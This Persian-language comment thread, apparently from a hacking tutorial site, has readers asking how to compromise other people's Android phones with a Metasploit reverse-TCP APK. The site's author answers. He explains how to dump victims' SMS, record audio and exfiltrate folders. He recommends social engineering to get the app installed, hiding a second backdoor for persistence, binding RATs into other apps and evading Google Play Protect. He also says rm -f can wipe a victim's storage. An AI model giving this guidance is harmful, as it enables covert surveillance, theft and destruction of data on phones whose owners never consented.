      دقیق تر توضیح بدین مشکل را و ارور را ارسال کنید

  • mostafakn82 شهریور ۵, ۱۳۹۸ پاسخ

    سلام . خسته نباشید . ممنونم از آموزش کامل شما .
    همه چیز درسته . ولی می خواستم بدونم که آیا غیر از sms ها و Contacts های تارگت . چیز های دیگر رو چه جوری می توان به دست آورد ؟؟

    • Nima Nani مهر ۲۴, ۱۳۹۸ پاسخ

      درود و تشکر
      به بخش های زیادی از دستگاه مانند دوربین برنامه ها و … دسترسی پیدا میکنید که سعی میشود در اموزش های بعدی در این رابطه به صورت کامل اموزش قرار داده شود

  • ali شهریور ۱۲, ۱۳۹۸ پاسخ

    سلام خسته نباشید. میخواستم بدونم که آیا بعد از این که تارگت فایل apk رو نصب و بعد حذف کنه باز هم به سیستم اندرویدی تارگت دسترسی داریم؟

    یه سوال دیگه هم که داشتم اینه که ایا بعد از نصب برنامه خود به خود ناپدید میشه؟

    • Nima Nani شهریور ۲۷, ۱۳۹۸ پاسخ

      درود تشکر از شما دوست عزیز
      با حذف شدن اپ دسترسی شما هم از بین خواهد رفت برای حل مشکل هم میتوانید از بایندر ها استفاده کنید
      در رابطه با سوال دوم خیر اما میتوانید این کار را بر روی اپ اعمال کنید یا
      با اموزش نفوذ به اندروید این کار را با استفاده از رات ها میتوانید انجام دهید

  • محمد مهر ۱۱, ۱۳۹۸ پاسخ

    سلام ایا میشه یک برنامه رو مثل گوکل پلی نصب کرد بدون مجوز کاربر

    • Nima Nani مهر ۲۶, ۱۳۹۸ پاسخ

      درود
      خیر این امکان وجود ندارد مگر در صورت شخصی سازی و دستگاه باید به صورت روت شده باشد

  • mohsen.12428 آبان ۲, ۱۳۹۸ پاسخ

    سلام خسته نباشید
    من رات رو ساختم ولی برنامه فقط روی همون گوشی که باهاش رات رو ساختم فعال میشه و روی بقیه گوشی ها فعال نمیشه
    یعنی وقتی exploit رو مینویسم اگه برنامه روی همون گوشی که رات رو باهاش ساختم نصب باشه اینطوری رات فعال میشه و کار میکنه ولی روی گوشی دیگه ای کار نمیکنه
    میشه بفرمایید مشکل از چیه؟

    • Nima Nani آبان ۳, ۱۳۹۸ پاسخ

      درود و تشکر
      احتمالا مشکل از تنظیمات اتصال شبکه شماست اول باید بفرمایید که داخل شبکه داخلی انجام میشود یا خیر ؟
      اگر از شبکه اینترنت برای اتصال استفاده می کنید باید پورت فورواردینگ انجام دهید و با استفاده از no ip یا روش های دیگر dns ثابت بگیرید که اموزش ان ها در سایت قرار داده شده است و میتوانید جستجو نمایید یا سرور مجازی بگیرید که نیازی به این کار ها نداشته باشید

  • Teodor آبان ۳, ۱۳۹۸ پاسخ

    سلام داداش من msfconsole رو ک وارد میکنم ۳ تا خط نوشته میاد
    اولی rting the metasploit framework console…
    دومی warning: no database support: no database YAML file
    سومی سه تا ستارس
    بعدش باز میکنه این مراحلو میرم اخرش ک باید یدونه فایل بسازه نمیسازه راهنمایی کن تورو خدا

    • Nima Nani آبان ۱۵, ۱۳۹۸ پاسخ

      درود
      در مرحله اخر چه اروری دریافت میکنید؟
      یک بار دستور زیر را برای اپدیت متاسپلویت خود هم وارد کنید.
      apt-get update && apt-get dist upgrade

  • Mmd آبان ۷, ۱۳۹۸ پاسخ

    وقتی mafconsole رو میزنم
    یه چیزایی مینویسه ک جمله آخرش اینه
    From /uar/bin/mafconaole:48:in `<main
    لطفا بگید چطور میتونم درستش کنم

    • Nima Nani آبان ۲۳, ۱۳۹۸ پاسخ

      درود
      فایل های متاسپلویت شما به مشکل خورده یک بار کل برنامه های سیستم عامل خود را با دستور زیر اپدیت نمایید و سپس برسی کنید مشکل حل شده است یا خیر
      apt-get update

  • علی آبان ۸, ۱۳۹۸ پاسخ

    سلام من همه کا را رو کردم و روی started reverse TCP handler هست باید چقدر من منتظر نصب کردنش باشم اخه فایل ۱ مگی اینقدر طول نمیکشه ۱۵ دقیقه هست نصب نمیشه

    • Nima Nani آبان ۲۳, ۱۳۹۸ پاسخ

      درود
      دوست عزیز این بستگی به تارگتتون داره زمان مشخصی نداره

  • javad آبان ۲۰, ۱۳۹۸ پاسخ

    سلام وقت بخیر
    هرکار میکنم این ارور میاد
    root@kali:~# msfconsole
    [-] ***rtinG the Metasploit Framework console…\
    [-] * WARNING: No database support: No database YAML file
    [-] ***
    فایل و میسازه اما دسترسی نمیده فایل هم تو گوشی نصب نمیشه کامل
    دستور inconfig ای پی ۱۲۷.۰.۰.۱ و میده چیکار باید بکنم

    • Nima Nani آبان ۲۴, ۱۳۹۸ پاسخ

      درود
      با دستور زیر یک اپدیت کامل انجام دهید
      get-apt update && apt-get upgrade
      اتصال به شبکتون مشکل دارد و باید برسی کنید که به چه صورت اتصال را بر قرار کرده اید اگر از ماشین مجازی استفاده میک نید اموزش اتصال به اینترنت در vmware را مشاهده نمایید.

  • mahdi آبان ۲۱, ۱۳۹۸ پاسخ

    سلام چرا بعد از زدن use android/meterpreter/reverse_tcp دوباره تکرار میشه و در ضمن من تمامی مراحل رو رفتم ولی درست کار نکرد میشه کمک کنید ممنون

    • Nima Nani آبان ۲۴, ۱۳۹۸ پاسخ

      درود
      منظور شما از دوباره تکرار میشه چیست ؟
      باید شما مشکلی که دارید را به صورت دقیق بفرمایید تا بتوانیم شما را راهنمایی کنیم. می فرمایید (درست کار نکرده) ما نمیدانیم کدام بخش ایراد داشته و چه اروری داده است.

  • mahdi آبان ۲۱, ۱۳۹۸ پاسخ

    سلام دوباره….. میشه سایتی که متاسپلویت ات رو دانلود کردی به ماهم بگید ممنون از اموزشتان

    • Nima Nani آبان ۲۴, ۱۳۹۸ پاسخ

      درود
      متاسپلویت به صورت پیشفرض داخل سیستم عامل کالی لینوکس نصب است
      اما در صورتی که نیاز به فایل نصبی ان دارید میتوانید از لینک زیر اقدام کنید
      https://www.metasploit.com/download

  • arash آذر ۱۷, ۱۳۹۸ پاسخ

    سلام من همه کارهارو انجام دادم به گوشی طرف هم وصل شدم ولی وقتی دستوری میزنم مثلا میزنم اس ام اس هاشو بیاره یا هر دستور دیگه ای میزنه not found لطفا بگین باید چیکار کنم

    • نیما حسینی آذر ۲۵, ۱۳۹۸ پاسخ

      درود
      دو علت میتواند داشته باشد ۱ – کلا sms و یا موارد دیگری که تست می کنید واقعا در دستگاه وجود ندارد. ۲ – در هنگام نصب محدودیت دسترسی برای برنامه تعریف کرده اند و اجازه دسترسی به این اطلاعات را به برنامه شما نداده اند.

  • Saeed آذر ۲۰, ۱۳۹۸ پاسخ

    با سلام می خواستم اگه امکانش هست دستور ساخت پیلود با استفاده از ddns که به جای آی پی، url وارد کنیم رو توضیح بدید، یعنی بعد از msfvenom -p android/meterpreter/reverse چی بزنیم یا داخل همین متاسپلویت دستور به چه شکل هست؟ممنون.

  • ali دی ۱۵, ۱۳۹۸ پاسخ

    سلام. ببخشید وقتی وصل شد دستوری هست که با زدنش اگر برنامه رو هم ببنده قطع نشه

    • نیما حسینی دی ۲۹, ۱۳۹۸ پاسخ

      درود
      تا زمانی که برنامه حذف نشود دسترسی دارید اما برای حل این مسئله می توانید یک برنامه مخفی دیگر با دسترسی که دارید نصب کنید که این امکان تر متاسپلویت وجود دارد و می توانید با دستور help ان ها را مشاهده کنید.

  • Mhmolanaei دی ۱۷, ۱۳۹۸ پاسخ

    سلام خسته نباشید
    توی فایل که روی سیستم هدف نصب میشه چطور باید دستورات موردنظرمون رو بنویسیم؟ مثلا بخوایم بگیم از صفحه اسکرین شات بگیر ایمیل کن، دستورش به چه زبانی باید نوشت؟ جاوا، بش، یا خود دستورات متا اسپلیت؟

    • نیما حسینی دی ۲۷, ۱۳۹۸ پاسخ

      درود و تشکر از شما
      با دستورات خود متاسپلویت می توانید بیشتر مواردی که فرمودید را انجام دهید.

  • jelfer دی ۱۹, ۱۳۹۸ پاسخ

    سلام بعد از اینکه دسترسی متر پرتر رو گرفتیم چه دستوراتی رو باید وارد کنیم مثلا برای دسترسی به اس ام اس باید چی بزنیم

    • نیما حسینی دی ۲۸, ۱۳۹۸ پاسخ

      درود از help متاسپلویت استفاده کنید برای مثال برای مشاهده اسمس ها می توانید دستور dump_sms را بزنید که البته داخل دوره کالی لینوکس به صورت کامل اموزش داده شده است.

  • محمد جواد دی ۲۵, ۱۳۹۸ پاسخ

    سلام چرا نمیشه ما سوال بقیه که دنبال جواب هستن بدیم اجازه این کارو نداریم

    • نیما حسینی دی ۲۷, ۱۳۹۸ پاسخ

      درود
      چرا می توانید پاسخ سوالات دیگران را بدهید در کنار هر دیدگاه گزینه پاسخ قرار دارد یک بار بر روی ان بزنید و سپس پاسخ را در بخش دیدگاه ارسال کنید به این صورت می توانید پاسخ سوالات دیگران را دهید.

  • snake بهمن ۶, ۱۳۹۸ پاسخ

    سلام ببخشید من کل اینا رو تست کردم فقط یه مشکلی دارم اونم اینه که وقتی فایل apk رو میسازم و روی گوشی خودم نصب میکنم اکسپلوت رو اجرا میکنم کار نمیکنه .فقط در صورتی کار میکنه که لپتاپی که مودم اینترنت بهش وصله گوشی هم به همون مودم وصل باشه یعنی اگه از اینترنت ایرانسل استفاده کنم اصلا کار نمیکنه
    ممنون میشم راهنمایی کنید

    • نیما حسینی بهمن ۱۱, ۱۳۹۸ پاسخ

      درود
      آموزش پورت فورواردینگ را مشاهده کنید یا می توانید از سرور مجازی برای حل این مشکل استفاده کنید.

  • justin بهمن ۱۸, ۱۳۹۸ پاسخ

    با سلام و خسته نباشید !!
    من می تونم ار بعضی از دوستورات استافده کنم
    ولی مثلا دستور
    رکورد کردن صدای قربانی این رور رو میده
    Meterpreter session 8 closed. Reason: Died
    و بعد تازه هر چند دقیقه یک session رو میبنده و یکی دیگه باز میکنه
    می خواستم بدونم دلیلش چیه

    • نیما حسینی بهمن ۲۹, ۱۳۹۸ پاسخ

      درود بر شما
      دسترسی قطع شده است باید برسی کنید، در صورتی که برنامه مجوز دسترسی به میکروفون را نداشته باشد این مورد ممکن است به وجود اید.

  • Ali98oo بهمن ۲۰, ۱۳۹۸ پاسخ

    سلام. من هنگامی که میزنم ifconfig آی پی اصلی رو نمیده اینو میده
    ۱۲۷.۰.۰.۱
    چیکار کنم؟

    • نیما حسینی اسفند ۹, ۱۳۹۸ پاسخ

      درود
      حتما باید به شبکه متصل باشید و از برقراری اتصال خود مطمئن شوید ، در صورتی که از سرور مجازی استفاده می کنید می توانید از ای پی سرور استفاده کنید.

  • hoseen..125 بهمن ۲۹, ۱۳۹۸ پاسخ

    سلام چجوری میتونم راتو به عکس تزریق کنم وبا عکس نفوذ کنم؟

    • نیما حسینی اسفند ۱۱, ۱۳۹۸ پاسخ

      درود
      سوال شما بسیار کلی است ، برای این کار باید اسیب پذیری خاصی در سیستم عامل پیدا کنید که از این روش بتوانید نفوذ کنید برای مثال اموزش اسیب پذیری واتساپ را مشاهده کنید.

  • mehdier اسفند ۹, ۱۳۹۸ پاسخ

    سلام چگونه بعد از متصل شدن به قربانی دسترسی کامل بگیریم و دسترسی ما بسته نشود

    • نیما حسینی اسفند ۱۰, ۱۳۹۸ پاسخ

      درود
      برای مثال می توانید یک بکدور دیگر با نام دیگر به صورت مخفی در دستگاه موبایل نصب کنید تا در صورت حذف شدن برنامه اصلی دسترسی شما قطع نشود.

  • محمد اسفند ۹, ۱۳۹۸ پاسخ

    برای من WARNING: No database support: No database YAML file این ارور رو میده باید چیکار کنم

    • نیما حسینی اسفند ۱۲, ۱۳۹۸ پاسخ

      درود
      معمولا این ارور باعث ایجاد اختلالی نمی شود که نتوانید از ابزار استفاده کنید
      اما برای حل ان از طریق ترمینال دستور msconsole را نزنید و از منو کالی لینوکس ایکن متاسپلویت را انتخاب کنید و حتما متاسپلویت خود را اپدیت کنید.

  • amirmohsen اسفند ۱۳, ۱۳۹۸ پاسخ

    با سلام بعد از دسترسی گرفتن از اندروید که روت هم نیست ولی بلافاصله بعد از چند ثانیه دسترسی خارج میشه برای دسترسی داشتن طولانی آموزشی دارین ممنون میشم قرار بدین

    • نیما حسینی اسفند ۲۹, ۱۳۹۸ پاسخ

      درود
      باید مشکل را پیدا کنید از همین روش می توانید دسترسی به صورت طولانی مدت داشته باشید که البته داخل دوره اموزش کالی لینوکس به موارد مختلفی هم در این رابطه پرداخته شد.
      ابزار ها و رات های دیگری هم در پن تست کور معرفی شده است که می توانید با کمی جستجو انها را پیدا و استفاده کنید.

  • محمدرضا اسفند ۲۶, ۱۳۹۸ پاسخ

    من یه سوالی داشتم … میخواستم بدونم که بعد اینکه من همه کارارو کردم میخواستم به ویندوز انتقال بدم که بعد بدمش به گوشیم ….. ترمینال رو بستم … الان چجوری میتونم همونو باز کنم ؟ از جایی که منتظر نصب طرف باشیم تا بعد از نصب کار دلخواهمونو بکنیم؟….

    • نیما حسینی اسفند ۲۹, ۱۳۹۸ پاسخ

      درود
      مجدد متاسپلویت را باز کنید و پیلود خود را ست کنید و تنظیمات قبل که مربوط به پورت و ای پی شما بوده است را مجدد انجام دهید.
      به این صورت می توانید از اپ نصب شده از قبل استفاده کنید.

  • aliak96 اسفند ۲۷, ۱۳۹۸ پاسخ

    سلام من برای این کار از سرور مجازی سایت avalserver استفاده میکنم وقتی ای پی و پورت سرور مجازی را میزنم و فایل apk ساخته میشه از کجا فایل را پیدا کنم یعنی کجای سیستم کالی ذخیره می شود ؟؟
    چون قبل از اینکه از سرور مجازی استفاده کنم apk در قسمت home سیستم عامل ذخیره میشد اما الان نه
    ممنون میشم راهنماییم کنید .

    • نیما حسینی اسفند ۲۹, ۱۳۹۸ پاسخ

      درود
      مسیر فایل ساخته شده به سرور مجازی مربوط نیست فایل در بخش home ذخیره می شود دقت کنید که با چه یوزری وارد شده اید و مسیر همان یوزر را برسی کنید.
      همچنین در هنگام ایجاد فایل در بخشی که نام فایل را انتخاب می کنید می توانید مسیر ذخیره فایل را هم مشخص کنید.

  • ahoura اسفند ۲۸, ۱۳۹۸ پاسخ

    با سلام و خسته نباشید.
    یه سوال داشتم:از کجا بفهمیم در LPORT چه عددی رو وارد کرد.با تشکر

    • نیما حسینی اسفند ۲۹, ۱۳۹۸ پاسخ

      درود و تشکر
      پورت های شبکه از ۱ تا ۶۵۵۳۵ هستند که می توانید از بین این پورت ها ، یک پورت را برای این موضوع اختصاص دهید
      دقت داشته باشید برای جلوگیری از ایجاد مشکل از پورت های باز و پیشفرض استفاده نکنید که برای اشنایی با ان ها باید کمی با مفاهیم شبکه اشنا باشید.

  • Mhmolana فروردین ۱, ۱۳۹۹ پاسخ

    سلام خسته نباشید
    میخواستم بدونم راهی وجود داره بدون دسترسی فیزیکی یک فایل apk رو روی سیستم هدف نصب کرد؟

    • نیما حسینی فروردین ۱, ۱۳۹۹ پاسخ

      درود و تشکر
      با روش های مهندسی اجتماعی باید فایل را طوری به تارگت ارسال کنید که ان را نصب کند و بعد از گرفتن دسترسی می توانید مجدد بودن دسترسی فیزیکی برنامه های دیگری نصب کنید.

  • عرفان فروردین ۷, ۱۳۹۹ پاسخ

    من وقتی میخوام apk رو generate کنم اخطار میده میگه
    pauload generation failed: The argument could not be parsed correctly
    چیکار کنم ؟

    • نیما حسینی فروردین ۱۵, ۱۳۹۹ پاسخ

      درود
      یک بار کلا متاسپلویت را اپدیت کنید و مجدد تست کنید ببنید مشکگل حل می شود یا خیر.
      در صورتی که باز هم مشکل داشتید دستوری که وارد کرده اید را دقیقا ارسال کنید.

  • mod dp فروردین ۱۴, ۱۳۹۹ پاسخ

    سلام چرا برنامه ساخته شده درگوشی قربانی نصب میشه ولی در متاسپلویت هیچ تغیری نمیکنه ولی تو گوشی خودم نصب میکنم تو متاسپلویت اجرا میشه ولی قربانی نصب میکنه هیچی اتفاقی نمی افته

    • نیما حسینی فروردین ۱۵, ۱۳۹۹ پاسخ

      درود
      احتمالا شما فقط تنظیمات شبکه داخلی را انجام داده اید برای استفاده از این روش در شبکه اینترنت باید از سرور مجازی استفاده کنید یا درون سیستم خود پورت فورواردینگ انجام دهید که اموزش ان داخل سایت قرار دارد.

  • reza فروردین ۱۶, ۱۳۹۹ پاسخ

    سلام واسه من تا اخرش اوکیه اما اپ روی موبایل تصب نمیشه
    مشکل از چی میتونه باشه؟
    ورژن های خاصی از اندروید نیازه که بشه پیلود رو روش نصب کرد یا روی هر ورژنی نصب میشه ؟(ورژنم ۴.۱.۲)
    یا کار دیگه ای میشه انجام داد؟

    • نیما حسینی فروردین ۱۹, ۱۳۹۹ پاسخ

      درود
      احتمالا به دلیل سپر امنیتی گوگل است می توانید برای دور زدن ان از اینجا اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.

  • mod dp فروردین ۱۶, ۱۳۹۹ پاسخ

    سلام آقا نیما من حتی پورت فوروارینگ انجام میدم ولی نمیدنم چرا کار نمیکنه دلیلش چی ؟ تو متاسپلویت

    • نیما حسینی فروردین ۱۹, ۱۳۹۹ پاسخ

      درود
      دلیل اصلی که می تواند داشته باشد و بسیاری با ان مشکل دارند پورت فورواردینگ است طبق اموزش پورت فورواردینگ داخل سایت انجام دهید و پورت خود را با استفاده از سایت انلاین معرفی شده چک کنید.
      پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید تا نیازی به پورت فورواردینگ نداشته باشید.

  • Mohammad Sohani فروردین ۱۸, ۱۳۹۹ پاسخ

    سلام چطوری میشه وقتی نفوذ کردیم کل یک فولدر رو دانلود کرد ؟ چون تو اموزش فقط گفته بودید دونه دونه میشه فایل های یک فولدر رو دانلود کرد ، من میخوام کل یک فولدر رو دانلود کنم
    ممنون میشم کمکم کنید

    • نیما حسینی فروردین ۲۲, ۱۳۹۹ پاسخ

      درود
      می توانید با دسترسی کامند لاین یک فولدر را فشرده کنید و فایل فشرده را منتقل کنید.

  • محمد فروردین ۱۸, ۱۳۹۹ پاسخ

    سلام انجام دادم ولی کار نکرد نمیدونم چرا با پورت ۴۴۴۴ و ۴۴۳ دلیلش چیه؟

    • نیما حسینی فروردین ۱۹, ۱۳۹۹ پاسخ

      درود
      اگر از شبکه داخلی استفاده می کنید احتمالا ای پی صحیح وارد نکرده اید ، اگر هم داخل شبکه اینترنت اینکار را انجام می دهید احتمالا مراحل پروت فورواردینگ را به درستی انجام نداده اید.
      پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید.

  • محمد فروردین ۱۸, ۱۳۹۹ پاسخ

    سلام ممنون میشم اینم راهنمایی کنید
    Could not install packages due to an EnvironmentError: [Errno 13] Permission denied: ‘/usr/local/lib/python3.6/site-packages/soupsieve-2.0.dist-info’
    Consider using the `–user` option or check the permissions.

    You are using pip version 10.0.1, however version 20.0.2 is available.
    You should consider upgrading via the ‘pip install –upgrade pip’ command.

    • نیما حسینی فروردین ۱۹, ۱۳۹۹ پاسخ

      درود
      از نسخه قدیمی pip استفاده می کنید با دستور زیر ان را اپدیت کنید :
      pip install –upgrade pip

  • حمید فروردین ۲۲, ۱۳۹۹ پاسخ

    سلام
    برای مخفی شدن میشه TORمعرفی کرد به متاسپلویت یا فقط با سرور مجازی میشه مخفی شد
    اگه TOR Lمیشه اینکارو کرد توضیح بدید ممنون

    • نیما حسینی فروردین ۲۹, ۱۳۹۹ پاسخ

      درود
      خیر از تور نمی توانید برای اینکار استفاده کنید.

  • alireza3soot فروردین ۲۲, ۱۳۹۹ پاسخ

    سلام
    ببخشید من تمام کار هایی رو که گفتید مو به مو انجام دادم
    روی شبیه ساز اندروید مثل بلواستکس جواب میده
    ولی رو گوشی های حقیقی خیر و زمانی که رو برنامه ها کلیک میکنم هیچ اتفاقی نمی افته
    در ضمن من از شبکه ی wifi خانگی استفاده میکنم

    • نیما حسینی فروردین ۲۳, ۱۳۹۹ پاسخ

      درود
      از اتصال دستگاه موبایل به شبکه داخلیتون مطمئن شوید ، می توانید پورت فورواردینگ انجام دهید یا از سرور مجازی استفاده کنید و مجدد تست کنید.
      روی برنامه کلیک می کنید هیچ اتفاقی نباید بیفتد اما باید اتصال شما با دستگاه بر قرار شود.

  • Mhmolana فروردین ۲۳, ۱۳۹۹ پاسخ

    سلام خسته نباشید
    امکانش هست که فایل مخرب رو در اسکریپت یه برنامه دیگه قرار بدیم ؟ یعنی با نصب کردن یه برنامه عادی فایل مخرب هم همراه با کدهای اون برنامه وارد سیستم بشه

    • نیما حسینی فروردین ۲۴, ۱۳۹۹ پاسخ

      درود
      بله امکانش هست برای مثال داخل اموزش نفوذ به اندروید این روش اموزش داده شده است اما در متاسپلویت کمی متفاوت است که در اموزش های بعدی با این روش کار خواهیم کرد.

  • AMIR فروردین ۲۵, ۱۳۹۹ پاسخ

    با سلام
    من نته گوشیم رو هات اسپات می کنم ایا لازمه که پورت فورواردینگ رو انجام بدم ؟

    • نیما حسینی فروردین ۲۹, ۱۳۹۹ پاسخ

      درود
      خیر ، طبق اموزش پورت فورواردینگ قرار داده شده می توانید از روش ngrok استفاده کنید.

  • Mhmolana فروردین ۲۵, ۱۳۹۹ پاسخ

    سلام خسته نباشید
    ببخشید که انقدر سورال می کنم :))
    می خواستم بدونم من که با hotspot گوشی به اینترنت وصل میشم بعد از یکبار خاموش کردن سیستم ip عوض میشه و دسترسی رو از دست میدم ؟
    دوم اینکه با همین ویروس میشه موقعیت مکانی هم بدست آورد یا نه ؟

    • نیما حسینی اردیبهشت ۵, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      بله ، در این صورت دسترسی از بین خواهد رفت.
      با این روش می توانید از طریق ای پی محدوده کلی کلاینت را بدست اورید.

  • mm اردیبهشت ۷, ۱۳۹۹ پاسخ

    سلام من سوالی داشتم خدمتتون
    من اگر سرور بخرم(مهم نیست سرورم چی باشه؟ویندوز یا هر نوع لینوکسی؟؟؟
    سیستمم کالیه
    وقتی توی ترمینال اطلاعات رو وارد کنم کلا ایبی و بورت سرورم رو بزنم ؟همون واسه ست هم واسه هندلیر؟؟بعد از ساخت برنامه طرف نصب کنه
    من دیگه از توی ترمینال خود لینوکسم(روی سیستمم)میبینم؟؟؟یا باید توی سرور باشم و سرورم حتما باید کالی باشه؟

    • نیما حسینی اردیبهشت ۷, ۱۳۹۹ پاسخ

      درود
      سرور شما باید لینوکس باشد ،
      بله از ای پی سرور و پورت مورد نظر خود استفاده کنید.
      و از طریق اتصال به سرور می توانید کلاینت های خودتونو مدیریت کنید.

  • jack atila اردیبهشت ۱۱, ۱۳۹۹ پاسخ

    سلام خسته نباشید مرسی از اموزش های خوبتون من برای دسترسی به گوشی برای خارج از شبکه با ngrok هاست مجازی میسازم و با درستور msfvenom پیش میرم ک خارج از شبکه کنترل داشته باشم میخواستم بدونم راهی هست ک تو دستور ام اس اف ونوم برنامه رو هاید کرد یا خیر و اینکه برای قربانی پیغام اسیب به دستگاه از طرف گوگل نیاد

    • نیما حسینی اردیبهشت ۲۴, ۱۳۹۹ پاسخ

      درود و تشکر از شما
      پیشنهاد می کنیم طبق اموزش داده شده پیش بروید، برای حل این مشکلتون می توانید اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.

  • mohammad1313 اردیبهشت ۱۳, ۱۳۹۹ پاسخ

    سلام
    اگر بخواهم با متااسپلویت و از طریق اینترنت پابلیک از یک گوشی دسترسی بگیرم باید پورت فورواردینگ انجام بدم ؟
    ممنون

    • نیما حسینی اردیبهشت ۲۴, ۱۳۹۹ پاسخ

      درود
      اگر از سیستم شخصی استفاده می کنید بله؛ اما اگر از سرور مجازی استفاده می کنید خیر.

  • 166._.Abolfazl اردیبهشت ۱۵, ۱۳۹۹ پاسخ

    سلام خدمت شما
    تشکر از سایت بسار خوبتون
    من exploit رو که می زنم این رو نمایش می ده:
    Started reverse TCP handler on 192.168.50.136:6060
    میشه راهنمایی کنید لطفا…
    network هم روی NAT قرار دارد.
    ip رو درست وارد کردم.مطمئن هستم.
    لپ تاپ و موبایل هم به یک مودم جیبی متصل هستند.هر دو به یک مودم…
    میشه راهنمایی کنید ممنون می شم…

    • نیما حسینی اردیبهشت ۲۷, ۱۳۹۹ پاسخ

      درود بر شما، تشکر
      کاملا طبیعی است متاسپلویت منتظر برقراری ارتباط است.
      برنامه اندروید را بعد از نصب اجرا کنید اتصال بر قرار می شود.

  • حسین بردبار اردیبهشت ۲۷, ۱۳۹۹ پاسخ

    من متاسپلویت روی گوشیم نصب کردم و الان میخام فایل apk درست کردم پیدا کنم پیدا نمیکنم لطفا کمکم کنید

    • نیما حسینی اردیبهشت ۳۰, ۱۳۹۹ پاسخ

      درود
      احتمالا در همان مسیری که هستید فایل باید ساخته شده باشد اما شما می توانید در هنگامی که در خواست ساخت apk می کنید قبل از وارد کردن نام، ادرس دایرکتوری دلخواه خود را وارد کنید.

  • محمد خرداد ۹, ۱۳۹۹ پاسخ

    سلام برای هک حتما باید لپ تاپ و گوشی طرف مقابل به یک وای وای وصل شده باشن

    • نیما حسینی خرداد ۱۶, ۱۳۹۹ پاسخ

      درود
      خیر ، شما اگر ای پی شبکه داخلی خود را وارد کنید بله اما اگر از سرور مجازی استفاده کنید یا پورت فورواردینگ انجام دهید خیر.

  • Parsa Momen خرداد ۱۹, ۱۳۹۹ پاسخ

    سلام
    میخواستم بدونم که فقط گوشی ها ی اندرویدی را می شود هک کرد مثلا تبلت های اندرویدی را می شود هک کرد یا میشود اندروید پوشیدنی که بر روی ساعت ها نصب می شود یا اندروید تی وی را هم هک کرد؟

    • نیما حسینی خرداد ۲۴, ۱۳۹۹ پاسخ

      درود
      در هر دستگاه اندرویدی که بتوانید فایل apk نصب کنید می توانید از ان دسترسی بگیرید.

  • reza خرداد ۲۱, ۱۳۹۹ پاسخ

    سلام در قسمت ای پی که باید بدیم ب متاسپلویت ای پی گوشی یا اینترنت خودمونو وارد کنیم؟ اگ سرور مجازی باید استفاده کنیم اموزشش استفادش رو لینک بزارید ممنون میشم.

    • نیما حسینی خرداد ۲۴, ۱۳۹۹ پاسخ

      درود
      برای استفاده از طریق سیستم خودتون اموزش پورت فورواردینگ را مشاهده کنید ، در استفاده از سرور مجازی فقط ای پی پابلیک سرور مجازی را وارد کنید هیچ اموزش دیگری نیاز ندارد.

  • محمد تیر ۲, ۱۳۹۹ پاسخ

    با سلام‌ من فایل apk رو به تارگت‌ دادم‌ و دسترسی‌ ام‌ ایجاد شده میخواستم‌ بدونم‌ دستوری هست‌ که حافظه داخلی رو پاک‌ کنه

    • نیما حسینی تیر ۵, ۱۳۹۹ پاسخ

      از طریق دستورات وارد حافظه داخلی شوید و اطلاعات مورد نظرتونو با دستور rm -f پاک کنید.

  • محمد تیر ۲, ۱۳۹۹ پاسخ

    با سلام میخواستم‌ بدونم‌ بعد از نصب apk توسط کاربر چگونه گوشی را ریست‌ فکتوری کنیم‌ ایا دستوری هست که در ترمینال بزنیم

    • نیما حسینی تیر ۲۰, ۱۳۹۹ پاسخ

      درود
      می توانید از طریق دستورات پوشه های اصلی و مهم را حذف کنید که پوشه های مهم ممکن است در حالت روت فقط قابل حذف باشند.

  • A YAR تیر ۴, ۱۳۹۹ پاسخ

    سلام من exploit میزنم این میاد Handler failed to bind to وExploit failed: Errno::EACCES Permission denied – bind(2) for
    چکنم؟

    • نیما حسینی تیر ۲۱, ۱۳۹۹ پاسخ

      درود
      اجازه دسترسی ندارد از بخش apps دسترسی های برنامه را برسی کنید.
      و اگر برنامه امنیتی خاصی دارید موقتا ان را برای تست غیر فعال کنید.

  • alikhosravi تیر ۹, ۱۳۹۹ پاسخ

    سلام و درود مهندس خسته نباشید بنده چند سوال از شما دارم اونم اینکه از اونجایی که متاسپلویت ابزاری عمومی هست به سادگی گوگل پلی و سایر انتی ویروس ها اونو تشخیص میدن و باید برای حل این با استفاده از برنامه نویسی جاوا و صرف وقت نسبتا زیادی برنامه رو به طوری ویرایش کنیم که تارگت و انتی ویروس نفهمه اما همون جور که گفتم وقت زیادی میگیره و یکی دیگه از قابلیت های متاسپلویت دسترسی گرافیکی به برنامه های تارگته یعنی با استفاده از دستور اپ راین و نام پکیج برنامه که اسم پکیج برنامه با دستور اپ لیست بدست میاد میشه به برنامه های تارگت دسترسی داشت و جوری به نظر میرسه که انگار تلفن تارگت دست خود شخص نفوذ گره و من خیلی این قابلیت برام مهمه و گفتم به شما بگم که ایا رات یا پیلودی رو میتونید به بنده معرفی کنید که با برنامه ای دیگه ترکیب بشه و دسترسی گرافیکی به برنامه های تارگت بده ایا چنین رات رو شما میشناسید اگه میشناسید لطفا معرفی کنید با تشکر اقای حسینی موفق باشید

    • نیما حسینی تیر ۲۵, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      برای حل مشکل انتی ویروس اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.
      برای دسترسی گرافیکی از اندروید خیلی کار منطقی نیست بخواهید انجام دهید اما برای بایند کردن می توایند از رات هایی مانند اسپای نوت استفاده کنید یا از ابزار های بایندری که وجود دارند.

  • santiyago تیر ۱۳, ۱۳۹۹ پاسخ

    سلام خسته نباشید من با port forwarding و no ip مشکل دارم خوب من سیستم بیسم خودم کالی هست زیاد حرفه ای نیستم اما در حال یاد گیریش هستم و الان که یک سرور ابونتو دارم که مال یکی از دوستام هست خوب با port 22 و ip … که نمیگم اینجا خوب من دقیقا نمیدونم چرا کار نمیکنه برام وقتی ip و port رو معرفی میکنم اونجا میگه ست شد اما وقتیexploit میزنم میگه مشکل دارید در وصل شدن به ip و یکم خوندم این مطالب بالا رو خوب یه جا گفته بوید که از ip پابلیک استفاده کنید و این که منم معنی شو میدونم اما نمیدونم دقیقا کدوم میشه ip پابلیک واینکه من با نت گوشیم hotspot کردم به به laptopm اما نمیدونم چی کار کنم میشه یکم راهنماییم کنید و ایا حتما بیاد برم سرور کالی لینوکس بخرم برای انجامش ؟ واین که بخرم و یه سوال دیگه وقتی من راتم موفق ساخته شد خوب میخوام بایندش کنم توی عکس که یه اموزش دیدم که چگونه بایند کنم توی عکس راتو خوب 